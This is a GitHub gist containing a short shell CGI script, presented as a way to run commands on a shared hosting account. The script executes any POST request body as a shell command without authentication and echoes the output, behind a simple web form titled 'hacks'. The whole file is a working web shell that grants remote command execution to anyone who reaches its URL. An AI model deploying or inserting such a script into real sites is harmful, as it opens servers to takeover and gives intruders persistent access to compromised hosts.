Last active
February 6, 2019 02:15
-
-
Save ariankordi/c46ccff01168ae257d4359fc22c0d491 to your computer and use it in GitHub Desktop.
A super simple command line in shell CGI, this is useful for executing commands on a cPanel/Apache shared hosting account LOL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
if [ $REQUEST_METHOD = "POST" ]; then | |
echo | |
$(cat) 2>&1 | |
exit | |
fi | |
printf "Content-type: text/html\n\n" | |
#echo | |
cat << EOF | |
<!doctype html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<link rel="icon" href="data:;base64,iVBORw0KGgo="> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
<style> | |
button { | |
display: block; | |
font-size: 28px; | |
margin-bottom: 10px; | |
margin-top: 10px; | |
} | |
textarea { | |
display: block; | |
width: 800px; | |
height: 300px; | |
} | |
input { | |
width: 800px; | |
margin-top: 10px; | |
} | |
#error { | |
white-space: pre-wrap; | |
word-wrap: break-word; | |
color: red; | |
} | |
#success { | |
color: green; | |
} | |
@media screen and (max-width: 800px) { | |
button { | |
font-size: 14px; | |
margin-bottom: 5px; | |
} | |
textarea { | |
width: 98.5%; | |
} | |
input { | |
width: 98.5%; | |
} | |
} | |
</style> | |
<title>hacks XDXDXDDSXREXERFXDDXFR</title> | |
</head> | |
<body> | |
<div id="error" style="display: none;"></div> | |
<div id="success" style="display: none;"></div> | |
<textarea disabled></textarea> | |
<form> | |
<input placeholder="input" type="text"> | |
<button>exec</button> | |
</form> | |
<script> | |
// @license magnet:?xt=urn:btih:e95b018ef3580986a04669f1b5879592219e2a7a&dn=public-domain.txt | |
// variables for all of the elements that are going to be edited soon | |
var textarea = document.getElementsByTagName('textarea')[0], | |
input = document.getElementsByTagName('input')[0], | |
form = document.getElementsByTagName('form')[0], | |
button = document.getElementsByTagName('button')[0], | |
error = document.getElementById('error'), | |
success = document.getElementById('success'), | |
// xhr | |
req = new XMLHttpRequest(); | |
// execute the command, when the form is submitted | |
form.addEventListener('submit', event => { | |
event.preventDefault(); | |
// un-disable the button, hide error and success | |
button.setAttribute('disabled', ''); | |
error.setAttribute('style', 'display: none;'); | |
success.setAttribute('style', 'display: none;'); | |
// ask the user to enter a command please | |
if(input.value === '') { | |
button.removeAttribute('disabled'); | |
error.textContent = 'enter a command'; | |
error.removeAttribute('style'); | |
return; | |
} | |
textarea.textContent = ''; | |
// reset xhr and textarea (above) | |
req.open('POST', ''); | |
// when the xhr is finished | |
req.addEventListener('load', () => { | |
// un-disable the button | |
button.removeAttribute('disabled'); | |
if(req.status !== 200) { | |
// if there's an error, set error text and un-hide it | |
error.textContent = 'error posting ' + req.responseURL + ': ' + req.status + ' ' + req.statusText; | |
error.removeAttribute('style'); | |
return; | |
} else { | |
// add response to the textarea | |
textarea.textContent = req.response; | |
// scroll textarea to the bottom | |
textarea.scrollTop = textarea.scrollHeight; | |
// tell the user it finished executing | |
success.textContent = 'finished executing'; | |
success.removeAttribute('style'); | |
} | |
}); | |
// all of the event listeners have been assigned, so now send the xhr | |
// with the contents of input as the post data | |
req.send(input.value); | |
}); | |
// @license-end | |
</script> | |
</body> | |
</html> | |
EOF | |
#printenv |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment